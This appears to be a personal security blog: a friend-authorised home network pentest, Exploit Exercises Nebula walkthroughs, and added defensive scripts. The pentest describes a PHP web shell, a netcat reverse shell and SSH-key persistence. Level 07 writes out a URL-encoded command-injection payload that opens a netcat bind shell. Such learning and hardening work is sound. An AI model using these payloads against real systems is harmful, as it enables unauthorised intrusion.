Am I officially a white hat hacker now!?

A while ago, while developing a geocaching app for Pebble smartwatches called “Watch Caching”, I noticed a bug that could have security implications, so I reported it to Pebble using the white hat guidelines set out by them.

It took them a while, but they eventually got back to me and agreed that it was a security vulnerability and wanted to offer me a significant financial reward, as well as put me in the Pebble White Hat Hall of Fame.

This also took a while to come to fruition, but they did hold true to their word and sent me the money, followed a few days later by my name being added to the Pebble White Hat Hall of Fame!

Developing and debugging my own apps on jailbroken iOS 8.1 using Xcode 6.1 without paying Apple

A while back I used an app called JailCoder to enable me to run and debug my own apps on my jailbroken iPhone 5S without having to pay Apple for a full developer account. I’m still learning iOS development and I have nothing I want to submit to the app store, so I’m reluctant to pay the £100 that Apple wants to enable me to run my own code on my own device.

Given that Xcode is free, and that £100 per year would give me the ability to sell apps through the App Store, I think it’s a bargain if you are actually planning to distribute apps, but for me, just learning, it seems a bit steep.

There don’t seem to be many tutorials out there telling you how to do this for iOS 8.1 and Xcode 6.1 (they are all a bit outdated), but this is what worked for me:

  1. On your Jailbroken device install AppSync Unified 5.2-1 (or later) from AngelXWind’s repo. Don’t use any other AppSync, and if you have others, be sure to remove them.
  2. Open /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/SDKSettings.plist and change AD_HOC_CODE_SIGNING_ALLOWED to YES. You may need to duplicate it to the desktop, change it, save it, then drag and drop it back into the original folder, because OS X won’t let you edit the file in place.
  3. If Xcode was running, restart Xcode.
  4. Change your Project and Target settings to “Ad Hoc Code Sign” in Build Settings.
  5. Tell Xcode to run the app on the iPhone. At this point Xcode will put the app on your iDevice, but can’t debug it because it can’t attach to the process. The app will start then close immediately. You can manually start the app on the phone now, though.
  6. To enable debugging: in your project select File > New File > Property List and create a file called “Entitlements.plist”. Add “Can be debugged” or “get-task-allow” (both do the same thing) and set the value to YES.
  7. Now change your Project and Target Code Signing Entitlements (In Build Settings) to “Entitlements.plist” (you have to type it in).

Now Xcode can run and debug the app. Good luck!

Note that some people have issues because they have other AppSyncs installed. Remove all other AppSyncs and install AppSync Unified from http://cydia.angelxwind.net/ (you’ll have to add this repo to Cydia).

Thanks to Karen and Linus for developing AppSync Unified.

This subreddit may be helpful

I have a Raspberry Pi on the way

I ordered a Raspberry Pi yesterday.

I used to have a server running at home which served files, recorded tv, provided VPN, but I moved into a small flat, and there’s not much room for a server, not that my fiancée would be happy with anyway!

The Pi will give me a little server back again for the duration that I’m in this flat. I’m also looking at playing with XBMC and perhaps some PVR capabilities on it. Should be fun!

My first pentest on a friend’s network

Someone I have known for a while was aware of my growing interest in information security, and I had warned them a while ago that their network was probably vulnerable to attack because I had seen some web services that were not password protected running on their home public IP address.

I saw them over the Christmas/New Year period and they gave me permission to try and penetrate their network; specifically, they challenged me to change the root password on their unRAID server.

I started off by firing up my BackTrack 5 R3 VM and updating everything before registering Nessus and performing a scan of their public IP address.

Nessus didn’t find anything that was listed as critical, but it did show me that SSH was running on port 22, and it also showed me all the other ports that were open and had web servers running on them. I checked them all out and found, on various ports: the default Lion Server webpage, SABNZBd, SickBeard, Transmission, and the unRAID server.

The website served by the unRAID server was asking for a username and password using basic access authentication. That was no use, so I started looking into the other services. Not only were the operating interfaces unsecured, but their configuration sections were also open to anyone. I saw that SABNZBd was running as “admin” and that it had an option of running scripts when a download had completed. The method was to point SABNZBd to a folder containing scripts, start a download and then choose what script to run on completion. I knew I could download a file using SABNZBd or Transmission to any directory that the admin user had write permissions to, but I didn’t know at this stage how to make it executable.

I saw in SABNZBd’s preferences that I could specify the permissions (in octal format) of files and folders that were downloaded, so I ran SABNZBd on my machine, created a binary post on a newsgroup containing a script that was basically a reverse shell, and tested a download to my machine with SABNZBd set to mark everything as 777. It created a folder with 777 permissions, but the file was only 555. Presumably this was for security reasons – damn!

At this point I was wishing that their machine was running Windows rather than OS X, because SABNZBd on Windows only requires that a script’s file extension is in the PATHEXT environment variable. That would have been much easier than getting a file marked as executable.

I had to find another way of making an executable script on that machine. How could I get that machine to run my commands without having an executable script set… The web server, of course. I created my single-line PHP shell again (mentioned in a previous post), set Transmission to download files to the Lion web server’s default folder, created a torrent containing my PHP script and downloaded the torrent to the server using Transmission. I tested it with the command whoami, and it worked. I was in, but only as the user _www.

What could I do as _www? Not much, but I was able to create a reverse shell using netcat and take a look around the system. I couldn’t access admin’s files yet, but of course I could write to /tmp. If I could write to /tmp, I could create a script and mark it as executable by everyone. Then I could get SABNZBd to run it! I started thinking about making a script that would create a reverse shell, then it dawned on me: create a public/private key pair and add it to /Users/admin/.ssh/authorized_keys.

I uploaded my public key using my php shell script, and then created an executable script in /tmp that appended my key to authorized_keys.

I started a new SABNZBd download (I decided to just download something that was small, free and released under a CC licence) so as not to upset anyone. Obviously I now set my script to run. All went well, and I could now SSH into the machine as the admin user without a password.

At this point I cleaned up everything I had downloaded and just left my key in place so I could log in. I took a look around, but I couldn’t see anything to do with the unRAID server, so I thought I should report how far I had got.

They were surprised, and while I didn’t get into the unRAID server, I had gotten a lot further than they thought anyone would be able to. As a result of this, they have since enabled logins on all their web services and removed my public key, but they still do have some vulnerabilities, like ssh running on a default port and allowing password authentication (ripe for brute forcing). They are a lot safer than they were, but it may well be worth me going back and having another go at some point in the future.

A lot of the methods that I have used in this test were inspired by the challenges I have been working through on hackthissite.org and exploit-exercises.com, and I’m very grateful to them for making the challenges.

I’m tempted to try and create a VM with this vulnerable setup and release it. I would have to check the licences, but I think most of it could be done using open source solutions (Linux, Apache, SABNZBd, Transmission).
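The attack above ended with a public key being appended to /Users/admin/.ssh/authorized_keys, and the owner only found out because I told them. The check that would have caught it is a periodic comparison of every authorized_keys file against the fingerprints you actually issued. The script below is an added example written for this post, not code from it or from any of the projects mentioned; the key blobs and owner names in it are constructed, not real SSH keys.

```python
"""Audit authorized_keys files against an allowlist of key fingerprints.

Added example, not code from the original post.  Every key whose SHA256
fingerprint is not in the approved set is reported with its line number,
options field and comment.  All key blobs below are constructed for the
example and are not real SSH keys.
"""
import base64
import hashlib
import re
from typing import Dict, List, Optional, Tuple

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")
# A key-type token, the base64 blob, and an optional trailing comment; anything
# before the token is the options field (command="...", no-pty, from="...").
_KEY_RE = re.compile(r"(?:^|\s)(" + "|".join(map(re.escape, KEY_TYPES))
                     + r")\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$")


def fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints (unpadded base64)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_line(line: str) -> Optional[Tuple[str, str, str, str]]:
    """Return (options, key_type, fingerprint, comment), or None for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = _KEY_RE.search(line)
    if not m:
        return None          # not a key line (or a key type this audit does not know)
    options = line[: m.start()].strip()
    return options, m.group(1), fingerprint(m.group(2)), m.group(3) or ""


def audit(contents: str, approved: Dict[str, str]) -> List[dict]:
    """List every key whose fingerprint is not in `approved` (fingerprint -> owner)."""
    findings = []
    for lineno, line in enumerate(contents.splitlines(), 1):
        parsed = parse_line(line)
        if parsed and parsed[2] not in approved:
            options, key_type, fp, comment = parsed
            findings.append({"line": lineno, "type": key_type, "fingerprint": fp,
                             "comment": comment, "options": options})
    return findings


def _blob(label: bytes) -> str:
    return base64.b64encode(label).decode()   # constructed stand-in for a key blob


# Constructed sample file: two keys the owner issued plus one that was appended.
SAMPLE_KEYS = "\n".join([
    "# admin's own key",
    "ssh-ed25519 " + _blob(b"constructed-admin-key") + " admin@laptop",
    'command="/usr/bin/rsync --server" ssh-rsa ' + _blob(b"constructed-backup-key") + " backup@nas",
    "ssh-rsa " + _blob(b"constructed-appended-key") + " pentest@attacker",
])
APPROVED = {fingerprint(_blob(b"constructed-admin-key")): "admin laptop",
            fingerprint(_blob(b"constructed-backup-key")): "nightly backup job"}

if __name__ == "__main__":
    for f in audit(SAMPLE_KEYS, APPROVED):
        print(f"line {f['line']}: unapproved {f['type']} key {f['fingerprint']} {f['comment']!r}")
```

To use it on a real box, read each user's ~/.ssh/authorized_keys into `contents` and build `approved` from `ssh-keygen -lf` output for the keys you issued.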

Match.com just sent me an email containing my password in plain text!

A few weeks ago, when I was going through all my online accounts and making the passwords more secure and unique, I logged in to Match.com and deactivated my account. I didn’t delete it, just made it dormant. I did this because I found my fiancée over 3 years ago (via Match.com), so there was no reason to still have an active account. I didn’t want to delete the account because it had some of our earliest messages to each other saved.

Anyway, I checked my emails today and noticed that I had one from them encouraging me to re-activate my account. What was more concerning was that the email contained my password in plain text! Here is a screenshot of the email:

[Screenshot of the email, taken 2012-12-31]

I was about to submit them to plaintextoffenders.com but I did a search before and found that they were already added to the list 15 months ago, so I left a comment on the plaintextoffenders listing and decided to send a message to Match.com. The message was:

On the 20th of December 2012 I received an email encouraging me to reactivate my account. What concerns me is that in the body of the email was my password, in plain text! Firstly you should not be storing my password in plain text, and secondly (if you insist on storing passwords as plain text) you should not be sending it to me over something as insecure as email, especially if I didn’t request it!

I was about to submit match.com to http://plaintextoffenders.com, but when I searched, I saw that it was already submitted some 15 months ago. See http://plaintextoffenders.com/post/9744438766/match-com-dating-site-very-soon-after-i-got-this.

For a brief overview of why storing passwords in plain text is bad, you can start reading here: http://plaintextoffenders.com/about/

Please bear in mind that while you are now being shamed by plaintextoffenders.com, if you decide to fix the security flaw, your site would be moved to a different section of the site where you would be praised for admitting the fault and fixing it. See http://plaintextoffenders.com/reformed

I am in no way affiliated with plaintextoffenders.com, but I do support what they are trying to do and I would like to know if you are in the process of fixing, or plan to fix this security flaw in the near future?

Please reply to <email address removed>

I will update this post if/when I get a reply, but in the meantime I would recommend against joining Match.com and deleting any accounts you might have with them until they act a bit more responsibly.

Update: I got this email back from Match.com:

Thank you for contacting us at match.com.

We understand that you received an email from us on the 20th December 2012 with your password in plain text which you feel is a serious compromise of security.

We are really sorry about this error and I have forwarded your issue to our site developers to look into.

We hope you have found this information useful and please feel free to get in touch if there is anything further we can help you with. For answers to the most common questions click ‘Help’, available from the foot of any page.

At least they are not dismissing it. I wonder if anything will actually change?

I passed my course :-)

I was doing a free online networking course from Stanford University called “An Introduction to Computer Networks” recently, and they just told me that I passed.

Apparently I needed 50%, and I got 84%. I needn’t have tried so hard!

I think the course title was misleading; I was expecting to learn a bit more detail about stuff that I had already taught myself about simple LANs (network masks, routing, etc.), but it was much more than just this. It was actually more to do with how the internet works and included some quite complicated concepts and mathematical/statistical theories. I found it pretty hard work, to the point that I considered jacking it in a couple of times, because it was taking a lot of my evening and weekend time, but I’m glad I made it through. I’m just thankful that it was quite short (about 6 weeks) because now the pressure is off and I have some free time again.

The free course is by Stanford University professors Nick McKeown and Philip Levis and covers many subjects in detail, including:

  • Protocols:
    • IP
    • TCP
    • UDP
    • ICMP
    • ARP
    • DHCP
    • DNS
    • NAT
    • BGP
    • Ethernet
  • Other Theory:
    • Encapsulation
    • Packet Switching
    • Delays (End to End & Queueing)
    • Broadcasting
    • Routing
    • Wireless

The course goes into so much detail in these subjects, and in many more. They are planning on re-running the course in Autumn 2013, so if any of this sounds interesting to you, then you should definitely consider enrolling nearer the time.

So now I’m just waiting to receive my statement on completion… I think it’s due in the new year.

Lastly I should say thanks to Nick and Philip for putting the course together and for offering it for free – Cheers guys

Exploit Exercises – Nebula – Level 08

I must admit I needed a bit of help with this one; I had most of it but not quite all. It started with the following information:

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

So in ~flag08 there is one file of interest: capture.pcap. This is some captured network traffic. I copied this file onto my MacBook, opened it up in Wireshark and spent some time looking through it. I found some interesting information: for example, frame 43 contained a password prompt (the text “Password:”) from the server, followed by an ACK from the client, then all subsequent packet exchanges contained 1 byte of TCP payload data from the client followed by an empty TCP ACK packet from the server. Going through the packets, I could see that the user had sent “backdoor…00Rm8.ate.” and then the server had replied “Login incorrect”. If we right-click on a packet in the stream and select Follow TCP Stream, we can see this a bit more clearly.

But “backdoor…00Rm8.ate.” is not the password for flag08’s account, so we need to investigate further. While in the Follow TCP Stream view, I selected the hex dump view, and I could see that the dots are not all the same byte. Presumably they are all ASCII, so I checked the ASCII codes: 7f = backspace, 0d = carriage return.

So the password was “backd00Rmate”, which just so happens to be the password for flag08’s account.
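Doing the backspace bookkeeping by hand is fine for twelve characters, but it is easy to miscount. The script below is an added example (not part of the original write-up) that replays a character-at-a-time keystroke stream, applying the 0x7f erases and splitting on the 0x0d Enter, and also reproduces the "dots" view that hid the edits in the first place. The byte stream in it is constructed to match the sequence described above; it is not read from capture.pcap.

```python
"""Replay captured keystrokes, honouring backspaces, to recover what was typed.

Added example, not part of the original write-up.  Each client packet in the
level 08 capture carries one keystroke; the "dots" in Wireshark's ASCII view are
control bytes: 0x7f (what the terminal sends for the backspace key) and 0x0d
(carriage return, i.e. Enter).  The stream below is constructed to match the
sequence the post describes; it is not extracted from capture.pcap here.
"""
from typing import List

DEL, BS, CR, LF = 0x7F, 0x08, 0x0D, 0x0A

# Constructed: the client's bytes after the "Password:" prompt, one per packet.
CAPTURED_KEYSTROKES = b"backdoor" + b"\x7f\x7f\x7f" + b"00Rm8" + b"\x7f" + b"ate" + b"\x0d"


def wireshark_view(stream: bytes) -> str:
    """Mimic the ASCII pane: every non-printable byte is shown as '.', which is
    why the text view read "backdoor...00Rm8.ate." and hid the corrections."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in stream)


def replay_keystrokes(stream: bytes) -> List[str]:
    """Apply DEL/backspace editing and split on Enter; returns the submitted lines.

    Both 0x7f and 0x08 erase one character, a CR LF pair counts as a single
    Enter, and other control bytes (e.g. telnet negotiation) are dropped.
    """
    lines: List[str] = []
    buf: List[str] = []
    prev = None
    for b in stream:
        if b in (DEL, BS):
            if buf:
                buf.pop()
        elif b == CR or (b == LF and prev != CR):
            lines.append("".join(buf))
            buf = []
        elif 0x20 <= b < 0x7F:
            buf.append(chr(b))
        prev = b
    if buf:                       # an unterminated final line
        lines.append("".join(buf))
    return lines


if __name__ == "__main__":
    print("as shown:", wireshark_view(CAPTURED_KEYSTROKES))
    print("as typed:", replay_keystrokes(CAPTURED_KEYSTROKES))
```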

Exploit Exercises – Nebula – Level 07

This one starts with the following information:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

and the source code:

#!/usr/bin/perl
 
use CGI qw{param};
 
print "Content-type: text/html\n\n";
 
sub ping {
    $host = $_[0];
 
    print("<html><head><title>Ping results</title></head><body><pre>");
 
    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; } 
 
    print("</pre></body></html>");
 
}
 
# check if Host set. if not, display normal page, etc
 
ping(param("Host"));

We can see that the flag07 user has a thttpd.conf file in his directory, indicating that he has an HTTP daemon (web server) running. This is further confirmed by the fact that he has a Perl script (index.cgi) in his home directory.

The thttpd.conf file tells us that the web server is running on port 7007. I didn’t want to exit the VM, which meant that I didn’t have a web browser, but I do have wget, which allows me to make HTTP requests from the command line, so I ran:

wget -O- http://localhost:7007/index.cgi

and got some output telling me how to use ping (because it hadn’t been given sufficient arguments). From the Perl code, I could see that it wants a variable submitted as “Host”. It looks like it will use this as the machine name to ping. This time I tried:

wget -O- http://localhost:7007/index.cgi?Host=localhost

and got back ping results, but I need to get this script to do something other than ping… I can see that the ping command is just a string with the submitted host name “injected” into it. There is no input sanitisation going on, so it is ripe for some code injection.

I could get the script to copy my elevated-shell-launcher program and then set the setuid bit like I did in level 03, but this challenge reminded me of something I learned while playing with DVWA (using netcat to send a shell over the network), so I tried that method instead. The URL I need to load would submit the following as the Host variable:

;mkfifo /tmp/pipe;cat /tmp/pipe|bash|nc -l 4444 2>&1>/tmp/pipe;rm /tmp/pipe;

When injected into the command that is run in the Perl script, the actual command that is executed will be:

ping -c 3 ;mkfifo /tmp/pipe;cat /tmp/pipe|bash|nc -l 4444 2>&1>/tmp/pipe;rm /tmp/pipe; 2>&1

This is quite a command, so I’ll break it down:

  • ping -c 3 ; – This command will fail because there is no host given, but we don’t care about that
  • mkfifo /tmp/pipe; – Make a special “pipe” file in /tmp/pipe, I’ll explain why later…
  • cat /tmp/pipe|bash|nc -l 4444 2>&1>/tmp/pipe; – this reads data from /tmp/pipe and sends it to /bin/bash, which sends its output to nc, which is listening on port 4444, which then sends its output (stdout and stderr) back to /tmp/pipe.
  • rm /tmp/pipe; – clear up the pipe file after nc has closed.
  • 2>&1 – Redirects stderr to stdout. This is just left over from the perl script’s command, we don’t care about it really.

This should set up a netcat process listening on TCP port 4444 that will accept data (in our case this will be bash commands) from the network and send it to /tmp/pipe. cat will read data from /tmp/pipe and send it to bash, which will send its output to netcat, which will in turn send that back over the network. A kind of remote shell. Passing input/output of netcat and bash in this circular fashion is only possible by way of a FIFO pipe and the cat command.

Obviously I’ll have to URL encode my host variable, so my whole command becomes:

wget -O- http://localhost:7007/index.cgi?Host=%3Bmkfifo%20%2Ftmp%2Fpipe%3Bcat%20%2Ftmp%2Fpipe%7Cbash%7Cnc%20-l%204444%202%3E%261%3E%2Ftmp%2Fpipe%3Brm%20%2Ftmp%2Fpipe%3B

Now I just connect from another tty session or another machine on the network (though you’ll have to edit the command if you do that) using:

nc localhost 4444

Now I can run any command, including whoami and getflag.
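For contrast, here is what the index.cgi ping handler looks like when it is written not to be injectable. This is an added example of my own, in Python rather than the challenge's Perl, and it is not code from Exploit Exercises; the function names are my own. The two fixes are: only accept a value that is syntactically a hostname or IP literal, and hand it to ping as a separate argv element with no shell involved, so a ";" in the Host parameter is never parsed as a command separator.

```python
"""Hardened version of the level 07 ping handler (added example, not the
challenge's code).  The original builds `ping -c 3 $host 2>&1` as a shell
string, so everything after a ';' in the Host parameter is executed.  Here the
value is validated as a hostname/IP literal and then passed as its own argv
element, with no shell, so shell metacharacters have no meaning at all.
"""
import ipaddress
import re
import subprocess
from typing import List

# One DNS label: 1-63 chars, letters/digits/hyphens, no leading or trailing hyphen
# (RFC 1123).  Rejecting a leading '-' also stops the value being read as an option.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_host(host: str) -> bool:
    """True for a syntactically valid hostname or IPv4/IPv6 literal, else False."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)          # accepts e.g. 192.168.1.10 or ::1
        return True
    except ValueError:
        pass
    return all(_LABEL.match(label) for label in host.rstrip(".").split("."))


def unsafe_command(host: str) -> str:
    """What the Perl script effectively runs: the untrusted value inside a shell string.
    Returned for illustration only; never execute this."""
    return f"ping -c 3 {host} 2>&1"


def safe_ping_argv(host: str) -> List[str]:
    """Validate, then return an argv list; raises ValueError for anything that is not a host."""
    if not is_valid_host(host):
        raise ValueError(f"rejected Host parameter: {host!r}")
    return ["ping", "-c", "3", host]


def ping(host: str, timeout: float = 15.0) -> str:
    """Run ping without a shell; stderr is merged like the original's 2>&1."""
    result = subprocess.run(safe_ping_argv(host), capture_output=True, text=True,
                            timeout=timeout, check=False)
    return result.stdout + result.stderr


if __name__ == "__main__":
    for candidate in ("localhost", "192.168.1.10", "localhost; id"):
        try:
            print(candidate, "->", safe_ping_argv(candidate))
        except ValueError as exc:
            print(candidate, "->", exc)
```

The output printed into the HTML page should also be escaped (the original prints ping's output raw inside a <pre>), but that is a separate bug from the injection.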

Exploit Exercises – Nebula – Level 06

Even less information about this one:

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

I had a good idea what I was looking for here: an easy-to-crack password hash in /etc/passwd rather than in the shadow file, so:

cat /etc/passwd | grep flag06

shows me the hash is ueqwOCnSGdsuM. I need to “crack” the hash. Time to get John the Ripper on the case. At this point I didn’t have any other Linux machines to hand, so I went to another tty session on this one, logged in as nebula and installed john (sudo apt-get install john). Then I ran john on the password file (john /etc/passwd) and it showed me the password. I switched over to the flag06 account and the password worked as expected.
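The reason this level is so quick is that the hash is sitting in a world-readable file, and it is a 13-character DES crypt(3) hash (2-character salt plus 11 characters of output, built from at most 8 password characters), which is the easiest format john handles. The check below is an added example of mine, not from the challenge: it walks passwd-format lines and reports any account whose password field holds a hash rather than the "x" that points at /etc/shadow. The sample file content is constructed; only the flag06 line uses the hash quoted above.

```python
"""Find accounts whose password hash sits in /etc/passwd instead of /etc/shadow.

Added example, not from the challenge.  The passwd content below is
constructed; the flag06 hash is the one quoted in the post, the other lines are
made up to show each kind of password field.
"""
import re
from typing import Dict, List

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
legacy:$6$saltsalt$somethinglong:1001:1001::/home/legacy:/bin/bash
locked:!:1002:1002::/home/locked:/bin/bash
"""

# Traditional DES crypt: 13 characters from the 64-char crypt alphabet, salt first.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")


def classify(field: str) -> str:
    """Describe the password field of a passwd (or shadow) entry."""
    if field == "x":
        return "shadowed"
    if field in ("*", "!", "!!"):
        return "disabled"
    if field == "":
        return "EMPTY (login with no password)"
    if field.startswith("$"):
        return "hash in passwd (modular crypt, id $%s)" % field.split("$")[1]
    if DES_CRYPT.match(field):
        return "hash in passwd (legacy DES crypt, 13 chars, salt %r)" % field[:2]
    return "hash in passwd (unrecognised format)"


def audit_passwd(contents: str) -> List[Dict[str, str]]:
    """Return one finding per account whose password field is neither shadowed nor disabled."""
    findings = []
    for line in contents.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:            # malformed line; passwd has exactly 7 fields
            continue
        verdict = classify(fields[1])
        if verdict not in ("shadowed", "disabled"):
            findings.append({"user": fields[0], "uid": fields[2], "issue": verdict})
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f['user']} (uid {f['uid']}): {f['issue']}")
```

On a real system, feed it `open("/etc/passwd").read()`; anything it reports should be moved into /etc/shadow with `pwconv` and the password changed, since the old hash must be treated as already cracked.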

Exploit Exercises – Nebula – Level 05

Not much information to start on this one:

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

The command ll (an alias for ls -alF) showed me that I had read access to ~flag05/.backup, and in there was a gzipped tar backup. Hopefully some goodies in here…

I unpacked the tar and found that it contained a folder called .ssh. This is used for secure shell authentication. That folder contained a private/public key pair and an authorized_keys file. The authorized_keys file is exactly the same as the public key file, so (assuming that the authorized_keys file had not been deleted since the backup) I should be able to SSH in using the private key, as long as it was not encrypted with a passphrase.

I copied the id_rsa file to ~/.ssh and tried to connect using:

ssh flag05@localhost

Bingo!